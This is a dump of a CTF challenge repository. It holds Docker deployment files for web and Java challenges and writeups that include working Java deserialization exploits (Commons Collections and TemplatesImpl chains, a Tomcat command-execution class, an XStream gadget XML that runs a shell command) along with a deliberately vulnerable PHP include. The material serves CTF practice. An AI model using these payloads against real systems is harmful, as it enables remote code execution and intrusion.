├── .gitignore
├── 0ctf-2021-final
    └── buggyLoader
    │   ├── deploy
    │       ├── Dockerfile
    │       ├── buggyloader.jar
    │       ├── default.conf
    │       ├── docker-compose.yml
    │       └── flag
    │   └── writeup
    │       ├── readme.md
    │       └── solution2
    │           ├── EvilClass.java
    │           ├── Exp.java
    │           └── Temp.java
├── 0ctf-2021
    ├── 0XStream
    │   ├── deploy
    │   │   └── attachment.link
    │   └── writeup
    │   │   └── touch.xml
    ├── 1linephp
    │   ├── README.md
    │   ├── deploy
    │   │   ├── 1linephp_reset.sh
    │   │   ├── Dockerfile
    │   │   ├── docker-compose.yml
    │   │   ├── flag
    │   │   └── source
    │   │   │   ├── index.php
    │   │   │   └── phpinfo.html
    │   └── writeup
    │   │   ├── 1linephp_writeup.md
    │   │   └── 1linephp_writeup_en.md
    └── 2rm1
    │   ├── deploy
    │       └── attachment.link
    │   └── writeup.md
├── 0ctf-2022
    ├── 3rm1
    │   ├── deploy
    │   │   ├── 3rm1-reset.sh
    │   │   ├── docker-compose.yml
    │   │   ├── rmiclient
    │   │   │   ├── Dockerfile
    │   │   │   ├── flag
    │   │   │   └── threermiclient.jar
    │   │   └── rmiserver
    │   │   │   ├── Dockerfile
    │   │   │   └── threermiserver.jar
    │   ├── readmd.md
    │   └── writeup
    │   │   └── readme.md
    └── hessian-onlyJdk
    │   ├── deploy
    │       ├── Dockerfile
    │       ├── JavaUtils.class
    │       ├── docker-compose.yml
    │       ├── flag
    │       ├── hessian-onlyJdk-reset.sh
    │       ├── hessian-onlyJdk.jar
    │       └── jvmtiagent.so
    │   ├── readmd.md
    │   └── writeup
    │       └── readme.md
├── aliyunctf-2023
    └── bypassit
    │   └── deploy
    │       ├── Dockerfile
    │       ├── bypass2-reset.sh
    │       ├── bypassit.jar
    │       ├── docker-compose.yml
    │       ├── flag
    │       ├── libnativerasp.so
    │       ├── naiverasp.jar
    │       └── readflag
└── hfctf-2022
    ├── ezchain
        ├── Dockerfile
        ├── docker-compose.yml
        ├── ezchain.jar
        ├── flag
        └── nginx.conf
    └── ezphp
        ├── Dockerfile
        ├── default.conf
        ├── flag
        ├── index.php
        └── nginx.conf


/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/deploy/Dockerfile:
--------------------------------------------------------------------------------
 1 | From openjdk:8u222-slim
 2 | 
 3 | RUN apt-get update -y \
 4 |     && apt-get install curl -y \
 5 |     && useradd ctf \
 6 |     && mkdir /opt/app
 7 | 
 8 | COPY buggyloader.jar /opt/app
 9 | COPY flag /flag
10 | 
11 | WORKDIR /opt/app
12 | 
13 | EXPOSE 8080
14 | 
15 | USER ctf
16 | CMD ["java", "-jar", "/opt/app/buggyloader.jar"]
17 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/deploy/buggyloader.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2021-final/buggyLoader/deploy/buggyloader.jar


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/deploy/default.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen       80;
 3 |     server_name  localhost;
 4 | 
 5 |     #charset koi8-r;
 6 |     #access_log  /var/log/nginx/host.access.log  main;
 7 | 
 8 |     location / {
 9 |         root   /usr/share/nginx/html;
10 |         index  index.html index.htm;
11 | 		proxy_pass http://web:8080;
12 |     }
13 | 
14 |     #error_page  404              /404.html;
15 | 
16 |     # redirect server error pages to the static page /50x.html
17 |     #
18 |     error_page   500 502 503 504  /50x.html;
19 |     location = /50x.html {
20 |         root   /usr/share/nginx/html;
21 |     }
22 | 
23 |     # proxy the PHP scripts to Apache listening on 127.0.0.1:80
24 |     #
25 |     #location ~ \.php$ {
26 |     #    proxy_pass   http://127.0.0.1;
27 |     #}
28 | 
29 |     # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
30 |     #
31 |     #location ~ \.php$ {
32 |     #    root           html;
33 |     #    fastcgi_pass   127.0.0.1:9000;
34 |     #    fastcgi_index  index.php;
35 |     #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;
36 |     #    include        fastcgi_params;
37 |     #}
38 | 
39 |     # deny access to .htaccess files, if Apache's document root
40 |     # concurs with nginx's one
41 |     #
42 |     #location ~ /\.ht {
43 |     #    deny  all;
44 |     #}
45 | }
46 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2.4'
 2 | services:
 3 |   nginx:
 4 |     image: nginx:1.15
 5 |     ports:
 6 |       - "0.0.0.0:40061:80"
 7 |     restart: always
 8 |     volumes:
 9 |         - ./default.conf:/etc/nginx/conf.d/default.conf:ro
10 |     networks:
11 |       - internal_network
12 |       - out_network
13 |   web:
14 |     build: ./
15 |     restart: always
16 |     networks:
17 |       - internal_network
18 | networks:
19 |     internal_network:
20 |         internal: true
21 |         ipam:
22 |             driver: default
23 |     out_network:
24 |         driver_opts:
25 |             com.docker.network.driver.mtu: 1400
26 |         ipam:
27 |             driver: default
28 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/deploy/flag:
--------------------------------------------------------------------------------
1 | 0ops{shiro_deserialize_in_internal_network}
2 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/writeup/readme.md:
--------------------------------------------------------------------------------
1 | [solution 1](https://github.com/ceclin/0ctf-2021-finals-soln-buggy-loader) 
2 | 
3 | solution 2 provided by [C014](https://github.com/c014)


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/writeup/solution2/EvilClass.java:
--------------------------------------------------------------------------------
 1 | package com.yxxx.buggyLoader;
 2 | 
 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 8 | 
 9 | public class EvilClass extends AbstractTranslet {
10 |     static {
11 |         try {
12 |             java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
13 |             java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
14 |             java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
15 |             java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);            contextField.setAccessible(true);
16 |             serviceField.setAccessible(true);
17 |             requestField.setAccessible(true);
18 |             getHandlerMethod.setAccessible(true);
19 |             org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
20 |                     (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
21 |             org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
22 |             org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
23 |             org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
24 |             for (int i=0;i<connectors.length;i++) {
25 |                 if (4==connectors[i].getScheme().length()) {
26 |                     org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
27 |                     if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
28 |                         Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
29 |                         for (int j = 0; j < classes.length; j++) {
30 |                             if (52 == (classes[j].getName().length())||60 == (classes[j].getName().length())) {
31 |                                 java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
32 |                                 java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
33 |                                 globalField.setAccessible(true);
34 |                                 processorsField.setAccessible(true);
35 |                                 org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler,null));
36 |                                 java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
37 |                                 for (int k = 0; k < list.size(); k++) {
38 |                                     org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
39 |                                     if ("c014".equals(tempRequest.getHeader("c014"))) {
40 |                                         org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
41 |                                         String cmd = tempRequest.getHeader("X-FLAG");
42 |                                         String[] cmds =  new String[]{"/bin/bash", "-c", "cat /flag"};
43 |                                         java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
44 |                                         java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
45 |                                         String output = s.hasNext() ? s.next() : "";
46 |                                         java.io.Writer writer = request.getResponse().getWriter();
47 |                                         java.lang.reflect.Field usingWriter = request.getResponse().getClass().getDeclaredField("usingWriter");
48 |                                         usingWriter.setAccessible(true);
49 |                                         usingWriter.set(request.getResponse(), Boolean.FALSE);
50 |                                         writer.write(output);
51 |                                         writer.flush();
52 |                                         break;
53 |                                     }
54 |                                 }
55 |                                 break;
56 |                             }
57 |                         }
58 |                     }
59 |                     break;
60 |                 }
61 |             }
62 |         }catch (Exception e){
63 |         }
64 |     }
65 | 
66 | 
67 | 
68 |     public static void main(String[] args) {
69 | 
70 |     }
71 | 
72 |     @Override
73 |     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
74 | 
75 |     }
76 | 
77 |     @Override
78 |     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
79 | 
80 |     }
81 | }
82 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/writeup/solution2/Exp.java:
--------------------------------------------------------------------------------
 1 | package com.yxxx.buggyLoader;
 2 | 
 3 | import org.apache.commons.collections.functors.InvokerTransformer;
 4 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
 5 | import org.apache.commons.collections.map.LazyMap;
 6 | 
 7 | import javax.management.remote.JMXServiceURL;
 8 | import javax.management.remote.rmi.RMIConnector;
 9 | import java.io.ByteArrayOutputStream;
10 | import java.io.ObjectOutputStream;
11 | import java.lang.reflect.Constructor;
12 | import java.lang.reflect.Field;
13 | import java.util.HashMap;
14 | import java.util.HashSet;
15 | import java.util.Map;
16 | 
17 | public class Exp {
18 |     public static void main(String[] args) throws Exception{
19 |         ByteArrayOutputStream baos = new ByteArrayOutputStream();
20 |         ObjectOutputStream oos = new ObjectOutputStream(baos);
21 | 
22 |         Constructor con = InvokerTransformer.class.getDeclaredConstructor(String.class);
23 |         con.setAccessible(true);
24 |         
25 |         InvokerTransformer transformer = (InvokerTransformer) con.newInstance("connect");
26 | 
27 |         JMXServiceURL jurl = new JMXServiceURL("service:jmx:rmi://c014:37777/stub/" + Temp.getExp());
28 |         Map hashMapp = new HashMap();
29 |         RMIConnector rc = new RMIConnector(jurl,hashMapp);
30 | 
31 |         Map hashMap = new HashMap();
32 |         Map lazyMap = LazyMap.decorate(hashMap, transformer);
33 | 
34 |         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, rc);
35 | 
36 | 
37 |         HashSet hashSet = new HashSet(1);
38 |         hashSet.add("c014");
39 |         Field fmap = hashSet.getClass().getDeclaredField("map");
40 |         fmap.setAccessible(true);
41 |         HashMap innimpl = (HashMap) fmap.get(hashSet);
42 |         Field ftable = hashMap.getClass().getDeclaredField("table");
43 |         ftable.setAccessible(true);
44 |         Object[] nodes =(Object[])ftable.get(innimpl);
45 |         Object node = nodes[1];
46 |         Field fnode = node.getClass().getDeclaredField("key");
47 |         fnode.setAccessible(true);
48 |         fnode.set(node, tiedMapEntry);
49 | 
50 | 
51 |         oos.writeUTF("0CTF/TCTF");
52 |         oos.writeInt(2021);
53 |         oos.writeObject(hashSet);
54 |         oos.close();
55 | 
56 |         byte[] exp = baos.toByteArray();
57 |         String data = com.yxxx.buggyLoader.Utils.bytesTohexString(exp);
58 |         String cc = "curl -v http://121.4.155.228/buggy -H c014:c014 -d data="+data;
59 |         System.out.println(cc);
60 |         java.io.InputStream in = Runtime.getRuntime().exec(cc).getInputStream();
61 |         java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
62 |         String output = s.hasNext() ? s.next() : "";
63 |         System.out.println(output);
64 |     }
65 | }
66 | 


--------------------------------------------------------------------------------
/0ctf-2021-final/buggyLoader/writeup/solution2/Temp.java:
--------------------------------------------------------------------------------
 1 | package com.yxxx.buggyLoader;
 2 | 
 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 4 | 
 5 | import javassist.ClassPool;
 6 | import javassist.CtClass;
 7 | import org.apache.commons.collections.functors.InvokerTransformer;
 8 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
 9 | import org.apache.commons.collections.map.LazyMap;
10 | import sun.misc.BASE64Encoder;
11 | 
12 | import java.io.ByteArrayOutputStream;
13 | import java.io.File;
14 | import java.io.FileInputStream;
15 | import java.lang.reflect.Field;
16 | import java.nio.file.Files;
17 | import java.nio.file.Path;
18 | import java.util.HashMap;
19 | import java.util.HashSet;
20 | import java.util.Map;
21 | 
22 | import java.io.ObjectOutputStream;
23 | public class Temp {
24 |     public static class StaticBlock { }
25 | 
26 |     public static void main(String[] args) throws Exception{
27 |         System.out.println(getExp());
28 |     }
29 |     public static String getExp() throws Exception {
30 |         //plz change path of EvilClass.class
31 |         byte[] bytecodes = Files.readAllBytes(new File("EvilClass.class").toPath());
32 |         
33 |         TemplatesImpl templatesimpl = new TemplatesImpl();
34 |         Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes");
35 |         fieldByteCodes.setAccessible(true);
36 |         fieldByteCodes.set(templatesimpl, new byte[][]{bytecodes});
37 |         Field fieldName = templatesimpl.getClass().getDeclaredField("_name");
38 |         fieldName.setAccessible(true);
39 |         fieldName.set(templatesimpl, "name");
40 |         Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory");
41 |         fieldTfactory.setAccessible(true);
42 |         fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
43 | 
44 |         final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
45 |         Map hashMap = new HashMap();
46 |         Map lazyMap = LazyMap.decorate(hashMap, transformer);
47 |         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templatesimpl);
48 | 
49 |         HashSet hashSet = new HashSet(1);
50 |         hashSet.add("c014");
51 |         Field fmap = hashSet.getClass().getDeclaredField("map");
52 |         fmap.setAccessible(true);
53 |         HashMap innimpl = (HashMap) fmap.get(hashSet);
54 |         Field ftable = hashMap.getClass().getDeclaredField("table");
55 |         ftable.setAccessible(true);
56 |         Object[] nodes =(Object[])ftable.get(innimpl);
57 |         Object node = nodes[1];
58 |         Field fnode = node.getClass().getDeclaredField("key");
59 |         fnode.setAccessible(true);
60 |         fnode.set(node, tiedMapEntry);
61 | 
62 |         Field f = transformer.getClass().getDeclaredField("iMethodName");
63 |         f.setAccessible(true);
64 |         f.set(transformer, "newTransformer");
65 | 
66 | 
67 |         ByteArrayOutputStream baos = new ByteArrayOutputStream();
68 |         ObjectOutputStream oos = new ObjectOutputStream(baos);
69 | 
70 |         oos.writeObject(hashSet);
71 |         byte[] exp = baos.toByteArray();
72 |         BASE64Encoder base64 = new BASE64Encoder();
73 |         oos.close();
74 |         String p = base64.encode(exp);
75 |         //System.out.println(p);
76 |         p = p.replace("\n", "");
77 |         return p;
78 |     }
79 | }
80 | 
81 | 


--------------------------------------------------------------------------------
/0ctf-2021/0XStream/deploy/attachment.link:
--------------------------------------------------------------------------------
1 | https://mega.nz/file/9ggFkYTT#V5bg58j7VPYGcRzF3Snu4unoL3BtTt0gSeB7Sd-TCog
2 | 


--------------------------------------------------------------------------------
/0ctf-2021/0XStream/writeup/touch.xml:
--------------------------------------------------------------------------------
 1 | <java.util.PriorityQueue serialization="custom">
 2 |   <unserializable-parents/>
 3 |   <java.util.PriorityQueue>
 4 |     <default>
 5 |       <size>2</size>
 6 |       <comparator class="com.sun.java.util.jar.pack.PackageWriter$2">
 7 |         <outer-class>
 8 |           <verbose>0</verbose>
 9 |           <effort>0</effort>
10 |           <optDumpBands>false</optDumpBands>
11 |           <optDebugBands>false</optDebugBands>
12 |           <optVaryCodings>false</optVaryCodings>
13 |           <optBigStrings>false</optBigStrings>
14 |           <isReader>false</isReader>
15 |           <bandHeaderBytePos>0</bandHeaderBytePos>
16 |           <bandHeaderBytePos0>0</bandHeaderBytePos0>
17 |           <archiveOptions>0</archiveOptions>
18 |           <archiveSize0>0</archiveSize0>
19 |           <archiveSize1>0</archiveSize1>
20 |           <archiveNextCount>0</archiveNextCount>
21 |           <attrClassFileVersionMask>0</attrClassFileVersionMask>
22 |           <attrIndexTable class="com.sun.javafx.fxml.BeanAdapter">
23 |             <bean class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
24 |               <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
25 |                 <default>
26 |                   <__name>Pwnr</__name>
27 |                   <__bytecodes>
28 |                     <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAD3RvdWNoIC90bXAvaGFjawgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHXlzb3NlcmlhbC9Qd25lcjk1NzE5Njk5NDI3MzUyAQAfTHlzb3NlcmlhbC9Qd25lcjk1NzE5Njk5NDI3MzUyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>
29 |                     <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
30 |                   </__bytecodes>
31 |                   <__transletIndex>-1</__transletIndex>
32 |                   <__indentNumber>0</__indentNumber>
33 |                 </default>
34 |                 <boolean>false</boolean>
35 |               </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
36 |             </bean>
37 |             <localCache>
38 |               <methods>
39 |                 <entry>
40 |                   <string>getOutputProperties</string>
41 |                   <list>
42 |                     <method>
43 |                       <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
44 |                       <name>getOutputProperties</name>
45 |                       <parameter-types/>
46 |                     </method>
47 |                   </list>
48 |                 </entry>
49 |               </methods>
50 |             </localCache>
51 |           </attrIndexTable>
52 |           <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>
53 |         </outer-class>
54 |       </comparator>
55 |     </default>
56 |     <int>3</int>
57 |     <string-array>
58 |       <string>yxxx</string>
59 |       <string>outputProperties</string>
60 |     </string-array>
61 |     <string-array>
62 |       <string>yxxx</string>
63 |     </string-array>
64 |   </java.util.PriorityQueue>
65 | </java.util.PriorityQueue>
66 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/README.md:
--------------------------------------------------------------------------------
1 | ## 1linephp
2 | 
3 | ### writeup
4 | 
5 | [中文](writeup/1linephp_writeup.md)
6 | 
7 | [English](writeup/1linephp_writeup_en.md)
8 | 
9 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/1linephp_reset.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | while true
3 | do
4 |     docker-compose down -v
5 |     docker-compose up -d
6 |     sleep 10m
7 | done
8 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7.4.11-apache
 2 | 
 3 | RUN sed -i 's/deb.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && \
 4 |     sed -i 's/security.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && \
 5 |     apt-get update -y && \
 6 |     apt-get install libzip-dev -y && \
 7 |     docker-php-ext-install zip && \
 8 |     mkdir /dd810fc36330c200a_flag
 9 | 
10 | COPY source /var/www/html
11 | COPY flag /dd810fc36330c200a_flag
12 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | 
3 | services:
4 |   web:
5 |     build: ./
6 |     restart: "always"
7 |     ports:
8 |       - "50080:80"


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/flag:
--------------------------------------------------------------------------------
1 | flag{flag}
2 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/source/index.php:
--------------------------------------------------------------------------------
1 | <?php
2 | ($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');
3 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/deploy/source/phpinfo.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
  2 | <html xmlns="http://www.w3.org/1999/xhtml"><head>
  3 | <style type="text/css">
  4 | body {background-color: #fff; color: #222; font-family: sans-serif;}
  5 | pre {margin: 0; font-family: monospace;}
  6 | a:link {color: #009; text-decoration: none; background-color: #fff;}
  7 | a:hover {text-decoration: underline;}
  8 | table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
  9 | .center {text-align: center;}
 10 | .center table {margin: 1em auto; text-align: left;}
 11 | .center th {text-align: center !important;}
 12 | td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
 13 | th {position: sticky; top: 0; background: inherit;}
 14 | h1 {font-size: 150%;}
 15 | h2 {font-size: 125%;}
 16 | .p {text-align: left;}
 17 | .e {background-color: #ccf; width: 300px; font-weight: bold;}
 18 | .h {background-color: #99c; font-weight: bold;}
 19 | .v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
 20 | .v i {color: #999;}
 21 | img {float: right; border: 0;}
 22 | hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
 23 | </style>
 24 | <title>PHP 7.4.11 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
 25 | <body><div class="center">
 26 | <table>
 27 | <tr class="h"><td>
 28 | <a href="http://www.php.net/"><img border="0" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHkAAABACAYAAAA+j9gsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAD4BJREFUeNrsnXtwXFUdx8/dBGihmE21QCrQDY6oZZykon/gY5qizjgM2KQMfzFAOioOA5KEh+j4R9oZH7zT6MAMKrNphZFSQreKHRgZmspLHSCJ2Co6tBtJk7Zps7tJs5t95F5/33PvWU4293F29ybdlPzaM3df2XPv+Zzf4/zOuWc1tkjl+T0HQ3SQC6SBSlD6WKN4rusGm9F1ps/o5mPriOf8dd0YoNfi0nt4ntB1PT4zYwzQkf3kR9/sW4xtpS0CmE0SyPUFUJXFMIxZcM0jAZ4xrKMudQT7963HBF0n6EaUjkP0vI9K9OEHWqJLkNW1s8mC2WgVTwGAqWTafJzTWTKZmQuZ/k1MpAi2+eys6mpWfVaAPzcILu8EVKoCAaYFtPxrAXo8qyNwzZc7gSgzgN9Hx0Ecn3j8xr4lyHOhNrlpaJIgptM5DjCdzrJ0Jmce6bWFkOpqs0MErA4gXIBuAmY53gFmOPCcdaTXCbq+n16PPLXjewMfGcgEttECeouTpk5MplhyKsPBTiXNYyULtwIW7Cx1vlwuJyDLR9L0mQiVPb27fhA54yBbGttMpc1OWwF1cmKaH2FSF7vAjGezOZZJZ9j0dIZlMhnuRiToMO0c+N4X7oksasgEt9XS2KZCHzoem2Ixq5zpAuDTqTR14FMslZyepeEI4Ogj26n0vLj33uiigExgMWRpt+CGCsEePZqoePM738BPTaJzT7CpU0nu1yXpAXCC3VeRkCW4bfJYFZo6dmJyQTW2tvZc1nb719iyZWc5fmZ6Osu6H3uVzit52oBnMll2YizGxk8muFZLAshb/YKtzQdcaO3Y2CQ7eiy+YNGvLN+4+nJetm3bxhKJxJz316xZw1pbW9kLew+w1944XBEaPj6eYCeOx1gqNe07bK1MwIDbKcOFOR49GuePT5fcfOMX2drPXcQ0zf7y2tvbWVdXF/v1k2+yQ4dPVpQ5P0Um/NjoCX6UBMFZR6k+u7qMYVBYDIEqBW7eXAfPZX19zp2/oaGBHysNMGTFinPZik9fWggbI5Omb13zUDeB3lLsdwaK/YPeyAFU0i8Aw9/2Dwyx4SPjFQEYUlf3MTYw4Jx7CIVCbHR0oqIDNMD+FMG+ZE0dO/tsHlvAWnYS6H4qjfMC+Zld/wg92/tuv2WeeYT87j+H